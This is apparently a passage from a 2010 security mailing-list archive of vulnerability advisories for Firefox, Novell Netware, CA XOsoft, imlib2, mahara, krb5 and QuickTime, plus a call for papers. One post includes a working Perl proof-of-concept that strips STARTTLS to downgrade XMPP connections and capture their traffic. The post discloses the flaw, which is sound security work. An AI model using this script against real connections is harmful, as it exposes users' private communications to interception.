ZDI-10-063: Mozilla Firefox Cross Document DOM Node Moving Code Execution Vulnerability
ZDI-10-063: Mozilla Firefox Cross Document DOM Node Moving Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-063 April 5, 2010 -- CVE ID: CVE-2010-1121 -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox 3.6.x -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9666. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to bypass specific script execution enforcements on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists when moving DOM nodes in between documents with a specific timing while triggering garbage collection. If timed correctly Firefox will incorrectly reference a previously freed object which can be leveraged by an attacker to execute arbitrary code under the context of the current user. -- Vendor Response: Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at: http://www.mozilla.org/security/announce/2010/mfsa2010-25.html -- Disclosure Timeline: 2010-03-26 - Vulnerability reported to vendor 2010-04-05 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Nils of MWR InfoSecurity (http://twitter.com/MWRlabs) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
ZDI-10-062: Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Remote Code Execution Vulnerabilities
ZDI-10-062: Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Remote Code Execution Vulnerabilities http://www.zerodayinitiative.com/advisories/ZDI-10-062 April 5, 2010 -- CVE ID: CVE-2010-0625 -- Affected Vendors: Novell -- Affected Products: Novell Netware -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6331. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Netware NWFTPD daemon. Authentication or default anonymous access is required to exploit this vulnerability. The specific flaw exists when parsing malformed arguments to the verbs RMD, RNFR, and DELE. Overly long parameters will result in stack based buffer overflows which can be leveraged to execute arbitrary code. -- Vendor Response: Novell states: A public fix for this issue has been released in download nwftpd16.zip, available at http://download.novell.com/patch/finder/ -- Disclosure Timeline: 2008-08-26 - Vulnerability reported to vendor 2010-04-05 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Nick DeBaggis * Francis Provencher -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
Vulnerabilities in TAK cms
Hello Bugtraq! I want to warn you about security vulnerabilities in TAK cms. It's Ukrainian commercial CMS. - Advisory: Vulnerabilities in TAK cms - URL: http://websecurity.com.ua/4050/ - Timeline: 04.02.2009 - found vulnerabilities. 30.09.2009 - informed owners of web sites where I found these vulnerabilities. Taking into account, that I didn't find any contact data of developer of TAK cms, then I hope, that owners of that site informed him about these vulnerabilities. This is one of those cases with commercial CMS, where developers didn't leave any contact data and there is no information about them in Internet. 19.03.2010 - disclosed at my site. - Details: These are Insufficient Anti-automation and Brute Force vulnerabilities. Insufficient Anti-automation: http://site/about/contacts/ http://site/register/getpassword/ At these pages there is not protection from automated requests (captcha). Brute Force: http://site/auth/ http://site/admin/ In login forms there is no protection from Brute Force attacks. Vulnerable are all versions of TAK cms. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
[SECURITY] [DSA 2029-1] New imlib2 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-2029-1secur...@debian.org http://www.debian.org/security/ Nico Golde April 5th, 2010 http://www.debian.org/security/faq - -- Package: imlib2 Vulnerability : several Problem type : local Debian-specific: no Debian bug : 576469 CVE ID : CVE-2008-6079 It was discovered that imlib2, a library to load and process several image formats, did not properly process various image file types. Several heap and stack based buffer overflows - partly due to integer overflows - in the ARGB, BMP, JPEG, LBM, PNM, TGA and XPM loaders can lead to the execution of arbitrary code via crafted image files. For the stable distribution (lenny), this problem has been fixed in version 1.4.0-1.2+lenny1. For the testing distribution (squeeze), this problem has been fixed in version 1.4.2-1. For the unstable distribution (sid), this problem has been fixed in version 1.4.2-1. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/i/imlib2/imlib2_1.4.0-1.2+lenny1.dsc Size/MD5 checksum: 1152 b7cae77599a1ea2301395e18937d7788 http://security.debian.org/pool/updates/main/i/imlib2/imlib2_1.4.0.orig.tar.gz Size/MD5 checksum: 845017 1f7f497798e06085767d645b0673562a http://security.debian.org/pool/updates/main/i/imlib2/imlib2_1.4.0-1.2+lenny1.diff.gz Size/MD5 checksum:58816 01418de90dce3c411ff6794b5d9e06cd alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_alpha.deb Size/MD5 checksum: 238740 5d728b77bdaf3ad6c9b7ec58d6e0348f http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_alpha.deb Size/MD5 checksum: 430388 688de8efff4ab7f8612e46ab68febd5e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_amd64.deb Size/MD5 checksum: 374282 62e14bee1f8870b98bf76c04e3e7145f http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_amd64.deb Size/MD5 checksum: 220686 9d34ec5aa25ea6b531923d3db2553a4c arm architecture (ARM) http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_arm.deb Size/MD5 checksum: 340058 1e256f1b506e43e0c2d296fa6ea138ec http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_arm.deb Size/MD5 checksum: 206844 ce0402a348fb8dba20940c71ddde04f2 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_armel.deb Size/MD5 checksum: 342736 a9411677d132fbb85d89e0fae6edb22f http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_armel.deb Size/MD5 checksum: 215890 c80a62ed059ffd37d759e9192a22f220 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_hppa.deb Size/MD5 checksum: 389348 7800351accb00c01d81b7bf5a99b88d7 http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_hppa.deb Size/MD5 checksum: 227236 5b4a108161ef87f6907d35895bba46b9 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_i386.deb Size/MD5 checksum: 208152 ae8a6d6ac41ea4969133270f73dae53f http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_i386.deb Size/MD5 checksum: 334920 1fa233439d1346ff20e637648d9e878d ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_ia64.deb Size/MD5 checksum: 461632 27e0586a22c9232dc7d878bc242b391b http://security.debian.org/pool/updates/main/i/imlib2/libimlib2_1.4.0-1.2+lenny1_ia64.deb Size/MD5 checksum: 298746 133afe4b754ba5c17142e06afdfff6a1 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/i/imlib2/libimlib2-dev_1.4.0-1.2+lenny1_mipsel.deb Size/MD5 checksum: 372840
Miranda TLS MitM with XMPP/Jabber protocol
The Miranda IM instant messaging software silently falls back to unencrypted connections if a Jabber/XMPP server does not report that it supports TLS, even if Use TLS is checked. This allows an active attacker to perform MitM attacks on Jabber/XMPP connections which the user assumes to be secure. Proof of concept MitM server attached. Miranda IM team was notified via bugtracker. Issue was closed without being fixed, probably because of confusion with another, similar issue (posted here before, seemingly unrelated configuration settings could completely disable TLS, that one was fixed). I commented twice that this bug is not fixed, but no response was seen. Workaround: Use SSL. #!/usr/bin/perl # Miranda IM TLS MitM Proof of Concept # by Jan Schejbal, 2010-03-19 # MAY WORK WITHOUT MODIFICATIONS AGAINST OTHER CLIENTS WITH THIS ISSUE! # Generally: Will work if client also accepts unencrypted connections # if the server reports that TLS is not supported. # Tested only on WinXP SP3 with ActivePerl 5.10.0 # against Miranda 0.8.16 # Usage: # 1. Setup variables below, unless you want to test against jabber.ccc.de # (note that this script does not do real XML parsing. Other servers #might have slightly different code that will not be detected. #In such a case, connecting will lock up. Adapt the RegExp below.) # 2. Make 'victim' connect to this server instead of real server # Network-Jabber-Account-Manually specify connection host # (real attacks would use ARP spoofing, DNS spoofing or similar.) # 3. Enable 'Use TLS' # (make sure that 'Disable SASL' on advanced is UNCHECKED, #as it silently disables TLS!) # 4. Start script and connect with miranda # 5. If all works, the dump goes to STDOUT, state is shown on STDERR. # (All traffic should be sent in plain now!) use strict; use warnings; use IO::Socket; use IO::Select; my $server = 'jabber.ccc.de'; my $port = 5222; my $listenport = $port; my $sock = new IO::Socket::INET( LocalHost = '0.0.0.0', LocalPort = $listenport, Proto = 'tcp', Listen = 1, Reuse = 1, ); print STDERR Listening on $listenport for jabber connections\n; print STDERR Will forward to $server:$port\n; my $client_connection = $sock-accept(); print STDERR Incoming connection\n; my $server_connection = new IO::Socket::INET( PeerAddr = $server, PeerPort = $port, Proto = 'tcp', ); print STDERR Connected to server\n; $server_connection-blocking(0); $client_connection-blocking(0); my $sel = IO::Select-new(); $sel-add($server_connection); $sel-add($client_connection); my $server_hello_done = 0; my $server_hello_data; my $readdata; my @ready; while(@ready = $sel-can_read()) { foreach my $ready_conn (@ready) { if (!sysread($ready_conn, $readdata, 1)) { print STDERR \nReading failed!\n; exit(1); } print $readdata\n; if ($ready_conn == $server_connection) { # read was from server if (!$server_hello_done) { $server_hello_data .= $readdata; print STDERR \nCurrent server hello buf: $server_hello_data\n\n; if ($server_hello_data =~ s|starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/||) { print STDERR removed STARTTLS offer from server hello\n; $server_hello_done = 1; print $client_connection $server_hello_data; print STDERR \nforwarded cached server hello buf: \n$server_hello_data\n\n; print STDERR MitM complete. Forwarding data ('' = to client, '' = to server)\n; } } else { print $client_connection $readdata; if ($server_hello_done) { print STDERR ''; } } } else { # read was from client, send to server print $server_connection $readdata; if ($server_hello_done) { print STDERR ''; } } } }
Hack.lu 2010 CfP
Call for Papers Hack.lu 2010 The purpose of the hack.lu convention is to give an open and free playground where people can discuss the implication of new technologies in society. hack.lu is a balanced mix convention where technical and non-technical people can meet each others and share freely all kind of information. The convention will be held in the Grand-Duchy of Luxembourg in October 2010 (27-29.10.2010). The most significant new discoveries about computer network attacks and defenses, commercial security solutions, and pragmatic real world security experience will be presented in a three days series of informative tutorials. We would like to announce the opportunity to submit papers, and/or lightning talk proposals for selection by the hack.lu technical review committee. This year we will be doing workshops on the first day and talks of 1 hour or 30 minutes in the main track the two following days. Scope == Topics of interest include, but are not limited to : * Software Engineering and Security * Honeypots/Honeynets * Spyware, Phishing and Botnets (Distributed attacks) * Newly discovered vulnerabilities in software and hardware * Electronic/Digital Privacy * Wireless Network and Security * Attacks on Information Systems and/or Digital Information Storage * Electronic Voting * Free Software and Security * Assessment of Computer, Electronic Devices and Information Systems * Standards for Information Security * Legal and Social Aspect of Information Security * Software Engineering and Security * Security in Information Retrieval * Network Security * Forensics and Anti-Forensics * Mobile Communications Security and Vulnerabilities Deadlines = The following dates are important if you want to participate in the CfP Abstract submission : no later than 1st June 2010 Full paper submission : no later than 15th July 2010 Notification date : mid of August Submission guideline Authors should submit a paper in English up to 5.000 words, using a non-proprietary and open electronic format. The program committee will review all papers and the author of each paper will be notified of the result, by electronic means. Abstract is up to 400 words. Submissions must be sent to http://2010.hack.lu/cfp/ Submissions should also include the following: 1. Presenter, and geographical location (country of origin/passport) and contact info. 2. Employer and/or affiliations. 3. Brief biography, list of publications or papers. 4. Any significant presentation and/or educational experience/background. 5. Reason why this material is innovative or significant or an important tutorial. 6. Optionally, any samples of prepared material or outlines ready. 7. Information about if yes or no the submission has already been presented and where. Presentations/topics that haven't been presented before will be rewarded. The information will be used only for the sole purpose of the hack.lu convention including the information on the public website. If you want to remain anonymous, you have the right to use a nickname. If the paper is not accepted in the main track, it could be accepted in short or lightning talk session but in this case the speakers' privileges are not applicable. Speakers' Privileges * Accommodation will be provided (3 nights) * Travel expenses will be covered up to a max amount * Conference speakers night Publication and rights == Authors keep the full rights on their publication/papers but give an unrestricted right to redistribute their papers for the hack.lu convention and its related electronic/paper publication. Sponsoring == If you want to support the initiative and gain visibility by sponsoring, please contact us by writing an e-mail to info(AT)hack.lu Web site and wiki = http://www.hack.lu/ CfP website : http://2010.hack.lu/cfp/
CA20100406-01: Security Notice for CA XOsoft
-BEGIN PGP SIGNED MESSAGE- CA20100406-01: Security Notice for CA XOsoft Issued: April 6, 2010 CA's support is alerting customers to multiple security risks with CA XOsoft products. Multiple vulnerabilities exist that can allow a remote attacker to gain sensitive information, cause a denial of service, or possibly execute arbitrary code. CA has issued patches to address the vulnerabilities. The first vulnerability, CVE-2010-1221, occurs due to a lack of authentication. An attacker can make a SOAP request to enumerate user names. This vulnerability has a low risk rating and affects r12.0 and r12.5 XOsoft products. The second vulnerability, CVE-2010-1222, occurs due to a lack of authentication. An attacker can make a SOAP request to gain potentially sensitive information. This vulnerability has a low risk rating and affects only r12.5 XOsoft products. The third set of vulnerabilities, CVE-2010-1223, occurs due to insufficient bounds checking. An attacker can make a request that can cause a buffer overflow which may result in a crash or possibly code execution. These vulnerabilities have a high risk rating and affect r12.0 and r12.5 XOsoft products. Risk Rating High Platform Windows Affected Products CA XOsoft Replication r12.5 CA XOsoft High Availability r12.5 CA XOsoft Content Distribution r12.5 CA XOsoft Replication r12.0 CA XOsoft High Availability r12.0 CA XOsoft Content Distribution r12.0 Non-Affected Products CA XOsoft Replication r4 CA XOsoft High Availability r4 CA XOsoft Content Distribution r4 How to determine if the installation is affected 1. Using Windows Explorer, locate the files mng_core_com.dll. By default, the file is located in the C:\Program Files\CA\XOsoft\Manager directory. 2. Right click on the file and select Properties. 3. Select the Version tab. 4. If the file version is previous than indicated in the below table, the installation is vulnerable. Product File Name File Version XOsoft 12.5 products mng_core_com.dll 12.5.2.563 XOsoft 12.0 products mng_core_com.dll 5.0.5.128 Solution CA issued the following patches to address the vulnerabilities. CA XOsoft Replication r12.5, CA XOsoft High Availability r12.5, CA XOsoft Content Distribution r12.5: RO15016 CA XOsoft Replication r12.0, CA XOsoft High Availability r12.0, CA XOsoft Content Distribution r12.0: RO16643 References CVE-2010-1221 - username enumeration CVE-2010-1222 - information disclosure CVE-2010-1223 - buffer overflows CA20100406-01: Security Notice for CA XOsoft (line wraps) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=23 2869 Acknowledgement CVE-2010-1221, CVE-2010-1222, CVE-2010-1223 - Andrea Micalizzi aka rgod reported through the TippingPoint ZDI program Change History Version 1.0: Initial Release If additional information is required, please contact CA Support at http://support.ca.com/ If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. (line wraps) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=17 7782 Kevin Kotas CA Product Vulnerability Response Team -BEGIN PGP SIGNATURE- Version: PGP 8.1 iQEVAwUBS7txcJI1FvIeMomJAQEvnQf/ZQ+LZTLLRETjr06imXzcuT1KtlsvpLQj s+h0HfJO36QYYHWpBENRIJliSQJqQSRY1Jzh0Zy2Ilxu4j5/sJsZS7QhCw+JXiP5 FHY+Hg6xkSazYkS2/9RAZWj47CYK/xg+PRhLcK6+WNwhvNDBj/sHCi+Ub8U9f+h3 K5qV9Lr4PrDJt5VZog41mqCSmRBvRmtKtEWm4nBp4ebE0drzzoscANBxTs60kExi l8cMGoQR8OpHfHDTk70iRxN8+JDHNEI4qObgK1tgugq7TLrflk2Ts1pUKnxopXP2 L6TY+2ofP4L2dCxWDcb1FtYYNM34iHMnNXQa+tmSmyPqT9FIcu15CA== =CUG9 -END PGP SIGNATURE-
ZDI-10-065: CA XOsoft xosoapapi.asmx Multiple Remote Code Execution Vulnerabilities
ZDI-10-065: CA XOsoft xosoapapi.asmx Multiple Remote Code Execution Vulnerabilities http://www.zerodayinitiative.com/advisories/ZDI-10-065 April 6, 2010 -- CVE ID: CVE-2010-1223 -- Affected Vendors: Computer Associates -- Affected Products: Computer Associates XOsoft High Availability Computer Associates XOsoft Replication -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9504,9507. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Computer Associates XOsoft Control Replication and High Availability Control Service. Authentication is not required to exploit this vulnerability. The specific flaws exist within the /ws_man/xosoapapi.asmx SOAP endpoint and occur when submitting malformed requests to the server. Successful exploitation can lead to code execution under the context of the service. -- Vendor Response: Computer Associates has issued an update to correct this vulnerability. More details can be found at: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=232869 -- Disclosure Timeline: 2009-12-16 - Vulnerability reported to vendor 2010-04-06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Andrea Micalizzi aka rgod -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
MITKRB5-SA-2010-003 [CVE-2010-0629] denial of service in kadmind in older krb5 releases
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 MITKRB5-SA-2010-003 MIT krb5 Security Advisory 2010-003 Original release: 2010-04-06 Last update: 2010-04-06 Topic: denial of service in kadmind in older krb5 releases CVE-2010-0629 denial of service in kadmind in older krb5 releases CVSSv2 Vector: AV:N/AC:L/Au:S/C:N/I:N/A:C/E:POC/RL:OF/RC:C CVSSv2 Base Score: 6.8 Access Vector: Network Access Complexity: Low Authentication: Single Confidentiality Impact: None Integrity Impact: None Availability Impact:Complete CVSSv2 Temporal Score: 5.3 Exploitability: Proof-of-Concept Remediation Level: Official Fix Report Confidence: Confirmed SUMMARY === In previous MIT krb5 releases krb5-1.5 through krb5-1.6.3, the Kerberos administration daemon (kadmind) can crash due to referencing freed memory. A legitimate user can trigger this crash by using a newer version of the kadmin protocol than the server supports. This is an implementation vulnerability in MIT krb5, and not a vulnerability in the Kerberos protocol. This vulnerability is not present in modern releases of MIT krb5. IMPACT == An authenticated remote attacker could crash the Kerberos administration daemon (kadmind), causing a denial of service. AFFECTED SOFTWARE = * kadmind in MIT releases krb5-1.5 through krb5-1.6.3. FIXES = * The krb5-1.7 release already contains a fix for this vulnerability. * Apply the patch below. The corresponding SVN revision (r22427) in our source tree contains additional use-after-free bugfixes; we believe that it is impractical for an attacker to induce execution of these sections of code. Index: src/kadmin/server/server_stubs.c === - --- src/kadmin/server/server_stubs.c (revision 22426) +++ src/kadmin/server/server_stubs.c(revision 22427) @@ -1628,7 +1628,7 @@ } if (ret.code != 0) - - errmsg = krb5_get_error_message(handle ? handle-context : NULL, ret.code); +errmsg = krb5_get_error_message(NULL, ret.code); else errmsg = success; This patch is also available at http://web.mit.edu/kerberos/advisories/2010-003-patch.txt A PGP-signed patch is available at http://web.mit.edu/kerberos/advisories/2010-003-patch.txt.asc REFERENCES == This announcement is posted at: http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-003.txt This announcement and related security advisories may be found on the MIT Kerberos security advisory page at: http://web.mit.edu/kerberos/advisories/index.html The main MIT Kerberos web page is at: http://web.mit.edu/kerberos/index.html This bug has been public for a while at http://krbdev.mit.edu/rt/Ticket/Display.html?id=5998 but the security consequence has not been previously widely known. The security consequence was first made public in a limited context in the Debian bug found at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=567052 CVSSv2: http://www.first.org/cvss/cvss-guide.html http://nvd.nist.gov/cvss.cfm?calculatoradvversion=2 CVE: CVE-2010-0629 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0629 ACKNOWLEDGMENTS === Thanks to Sol Jerome for reporting the kadmind crash to Debian. CONTACT === The MIT Kerberos Team security contact address is krbcore-secur...@mit.edu. When sending sensitive information, please PGP-encrypt it using the following key: pub 2048R/8B8DF501 2010-01-15 [expires: 2011-02-01] uid MIT Kerberos Team Security Contact krbcore-secur...@mit.edu DETAILS === MIT krb5 bug #5998 contains the earliest description of this bug. Debian bug #567052 (referenced above) contains the first public indication of the security consequence of this bug. Under error conditions, such as receiving an invalid kadmin API version number, the kadmin RPC stub init_2_svc() attempts to call krb5_get_error_message() on a krb5_context handle that is in a previously-freed kadm5_server_handle_t object. This typically results in a read operation on an invalid pointer, causing a crash and denial of service. Releases prior to krb5-1.5 did not use extended error information in this way, and therefore do not include the vulnerable code. The most likely cause of a crash is a legitimate user running a kadmin client from the krb5-1.8 or newer release, which sends an API version number not recognized by earlier releases. REVISION HISTORY 2010-04-06 original release Copyright (C) 2010 Massachusetts Institute of Technology -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (SunOS) iEYEARECAAYFAku7ebMACgkQSO8fWy4vZo6cZwCg+gPn5RIWuKBbdZi0NktOh+pC SNMAnj3SeOel4cx5v9SprM1MRZG/ERCQ =mKjF -END PGP SIGNATURE-
ZDI-10-066: CA XOsoft Control Service entry_point.aspx Remote Code Execution Vulnerability
ZDI-10-066: CA XOsoft Control Service entry_point.aspx Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-066 April 6, 2010 -- CVE ID: CVE-2010-1223 -- Affected Vendors: Computer Associates -- Affected Products: Computer Associates XOsoft High Availability Computer Associates XOsoft Replication -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9493. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Computer Associates XOsoft Control Replication and High Availability Control Service. Authentication is not required to exploit this vulnerability. The specific flaw exists within the /entry_point.aspx service and occurs due to an unbounded string copy utilizing a string controlled by the user as the source into a fixed length buffer located on the stack. Successful exploitation can lead to code execution under the context of the service. -- Vendor Response: Computer Associates has issued an update to correct this vulnerability. More details can be found at: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=232869 -- Disclosure Timeline: 2009-12-16 - Vulnerability reported to vendor 2010-04-06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Andrea Micalizzi aka rgod * AbdulAziz Hariri -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
[SECURITY] [DSA 2030-1] New mahara packages fix sql injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-2030-1secur...@debian.org http://www.debian.org/security/ Nico Golde April 6th, 2010 http://www.debian.org/security/faq - -- Package: mahara Vulnerability : sql injection Problem type : remote Debian-specific: no Debian bug : none CVE ID : CVE-2010-0400 It was discovered that mahara, an electronic portfolio, weblog, and resume builder is not properly escaping input when generating a unique username based on a remote user name from a single sign-on application. An attacker can use this to compromise the mahara database via crafted user names. For the stable distribution (lenny), this problem has been fixed in version 1.0.4-4+lenny5. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 1.2.4-1. We recommend that you upgrade your mahara packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny5.diff.gz Size/MD5 checksum:40648 cd057351de5462d5e1df2d75bf3f2247 http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny5.dsc Size/MD5 checksum: 1304 e87fa2a0e67a71eef479be5a5da65894 http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4.orig.tar.gz Size/MD5 checksum: 2383079 cf1158e4fe3cdba14fb1b71657bf8cc9 Architecture independent packages: http://security.debian.org/pool/updates/main/m/mahara/mahara-apache2_1.0.4-4+lenny5_all.deb Size/MD5 checksum: 8106 5b0910999a1bfdfbce8740219d9549dc http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny5_all.deb Size/MD5 checksum: 1662742 289da5fba44237ff1c17a462cb6cd9f7 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAku7gOQACgkQHYflSXNkfP/s9ACfWLS6O+LVnRo184+hB48h+Gsz S2oAn2QWYAIZWX44LijI3gF3AYkBqstJ =IiCK -END PGP SIGNATURE-
ZDI-10-067: Apple QuickTime Pict BkPixPat Remote Code Execution Vulnerability
ZDI-10-067: Apple QuickTime Pict BkPixPat Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-067 April 6, 2010 -- CVE ID: CVE-2010-0529 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9568. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the primary QuickTime.qts library when parsing the BkPixPat opcode (0x12) within a PICT file. The application will use 2 fields within the file in a multiply which is then passed as an argument to an allocation. As both operands in the multiply are user-controllable, specific values can cause an under allocation which will later result in a heap overflow. Successful exploitation can lead to code execution under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4104 -- Disclosure Timeline: 2009-11-06 - Vulnerability reported to vendor 2010-04-06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * 